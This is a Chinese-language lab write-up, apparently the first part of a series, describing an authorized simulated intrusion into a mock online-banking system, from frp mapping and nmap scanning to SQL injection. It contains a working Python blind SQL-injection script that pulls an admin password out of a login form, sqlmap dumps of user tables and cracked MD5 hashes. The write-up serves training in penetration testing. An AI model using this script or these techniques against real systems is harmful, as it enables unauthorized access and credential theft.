域渗透之外网打点到三层内网(一)

简介: 域渗透之外网打点到三层内网

环境搭建

1.项目介绍:

本次项目模拟渗透测试人员在授权的情况下,对目标进行渗透测试,从外网打点到内网横向渗透,最终获取整个内网权限。本次项目属于三层代理内网穿透,会学习到各种内网穿透技术,cobalt strike在内网中各种横行方法,也会学习到在工具利用失败的情况下,手写exp获取边界突破点进入内网,详细介绍外网各种打点方法,学习到行业流行的内网渗透测试办法,对个人提升很有帮助。


2.VPS映射

1.将ip映射到公网。在公网vps使用配置frp工具的frps.ini 运行frps.exe -c frps.ini

2aff0ec2b0dbe1aced76b7368dc623c2_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

在web1上配置frpc.ini 运行 frpc.exe -c frp.ini

dd65ff8741563403c989362e60eb6e0a_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png


成功访问到环境

http://x.x.x.x:8088/login.jsp

9de5ea9ad0c168b6ecb42561c0fb196f_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

信息收集

1.端口探测

6a994d9f489dae1c449319e60bd2afce_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

使用nmap进行端口探测,发现4444、5003、8088、8899、8878端口开放。

b510f8c2db63cbbffd8bf2aa8d5feb80_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后查看其详细信息。

e151a6383e51daec8f3f999a57424ffb_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

2.网站源代码查找

发现有一个网上银行系统。使用弱口令和暴力破解,没有爆破出弱口令用户。

fdbddc0fef68ed5c6e8a06f9d149b4c6_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

然后就在github试试运气,发现了源码。

41858841ff4441dd0ca0e3f956bbb2d4_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

源码地址:

https://github.com/amateur-RD/netBank-System

67a0b9e98f27dbb98d9d06f2bf6a6f08_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

发现了一个数据库文件,有一些普通用户和管理员用户的账户和密码。

d8cfcc0523e847d6ec5204aae0eb04d5_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

3.SQL注入

然后进行登录测试,发现存在sql注入漏洞

edcf72c564e1611bfa927c4760765612_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

网上银行系统Hsql注入漏洞

bfc9119fcf25573463b9d6653c57e3ee_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

使用sqlmap不能进行跑出用户名和密码。

0e45c256824eb6863618e93358db8f6c_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

4.编写脚本进行sql注入

#coding:utf-8
import requests
password=""
url="http://x.x.x.x:8878/admin/login"
payload="0123456789abcdefghijklmnopqrstuvwxyz"
password=""
for i in range(1,20):
 for j in payload:
   exp = "admin' and(select substring(password,%s,1) from Admin) like '%s'
or '1'='" %(i,j)
   print("正在注入")
   data = {"admin.username": exp, "admin.password": 'aaaa', "type": 1}
   req = requests.post(url=url, data=data);
   if "密码不正确" in req.text:
     password+=j
     break
print(password)

成功跑出密码。然后进行登录。

391503681959472764b2ad92b5b62fba_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

登录之后,寻找文件上传或者可以获取到webshell的地方,发现没有可利用点。

d06c2d4490b3ff87bc66da682901d163_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

5.tomexam SQL注入漏洞

在另一个地址处,发现可以注册用户。然后注册用户进行登录。

3b210cabaeb3928ac45e94338f417b20_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

登录之后发现,某处存在sql注入。

634c041aa3d03553a067dcfeaf8c394d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

6b6950baa039d2828ef498a451a43e0d_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

使用sqlmap进行获取用户信息。

057ef2867bb314471cbf7fbc2bf66403_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

944fc8fce8c0b71466dc597d1e8ddb95_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

| 1  | 1      | 1399999999 | 1      | 超级管理员 | admin    | admin    | 17D03DA6474CE8BEB13B01E79F789E63       | 2022-04-09 00:14:08 | 301        |
| 6  | 2      |     | 1      |     | eu3      | eu3      | 4124DDEBABDF97C2430274823B3184D4 (eu3) | 2014-05-17 13:58:49 | 14


成功抓到了管理员用户和密码,然后使用md5进行解密。

c93f2d33fd14d4cc8c326f8eb5f805a5_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png

成功进行登录。登录之后没有找到可getshell的地方。

f1d8ee3cc8c9ca6371e64604f432aca6_640_wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1.png



相关文章
|
6月前
仅操作一台设备,如何实现本地访问另一个相同网段的私网?
仅操作一台设备,如何实现本地访问另一个相同网段的私网?
|
5月前
|
安全 网络协议 Linux
【内网安全】 隧道技术&SMB&ICMP&正反向连接&防火墙出入规则上线
【内网安全】 隧道技术&SMB&ICMP&正反向连接&防火墙出入规则上线
|
6月前
|
监控 网络协议 安全
【亮剑】当设备IP能ping通但无法上网时,可能是DNS解析、网关/路由设置、防火墙限制、网络配置错误或ISP问题
【4月更文挑战第30天】当设备IP能ping通但无法上网时,可能是DNS解析、网关/路由设置、防火墙限制、网络配置错误或ISP问题。解决步骤包括检查网络配置、DNS设置、网关路由、防火墙规则,以及联系ISP。预防措施包括定期备份配置、更新固件、监控网络性能和实施网络安全策略。通过排查和维护,可确保网络稳定和安全。
1096 1
|
存储 安全 网络协议
《内网安全攻防》内网信息收集
《内网安全攻防》内网信息收集
86 0
|
安全 Java 关系型数据库
域渗透之外网打点到三层内网(二)
域渗透之外网打点到三层内网
223 0
域渗透之外网打点到三层内网(二)
|
SQL 安全 网络协议
域渗透之外网打点到三层内网(三)
域渗透之外网打点到三层内网
284 0
域渗透之外网打点到三层内网(三)
|
缓存 安全 网络安全
详解通信数据转发程序:代理、网关、隧道
1.代理 代理服务器的基本行为就是接收客户端发送的请求后转发给其他服务器 持有资源实体的服务器被称为源服务器。从源服务器返回的响应经过代理服务器后再传给客户端 每次通过代理服务器转发请求或响应时,会追加写入Via首部信息🎶
210 2
详解通信数据转发程序:代理、网关、隧道
|
网络协议 网络架构
不同网段通信的过程
不同网段通信的过程
521 0
|
缓存 网络协议 网络架构
跨网段通信过程
原因:封装3层:源IP、目的IP不变,封装2层:源MAC封装接口F0/1的MAC地址(192.168.1.100),目的MAC封装目的IP的MAC地址(192.168.2100),路由器去ARP缓存表中找到对应的地址,成功重新封装ICMP包并存F0/1中转发出去。步骤九:路由器从F0/0重新封装并转发的ICMP回应包原因:路由器收到PC2发表的ICMP回应包,逐层解封装(解封装2层,目的MAC是路由器自己接口的MAC地址,连续解封装3层,目的IP不是路由器自己的IP,根据目的IP 192.168.1.1与路由器中的每一个路由条目进行与运算,找到匹配的路由条目,根据该匹配的路由表重新封装。封装I
跨网段通信过程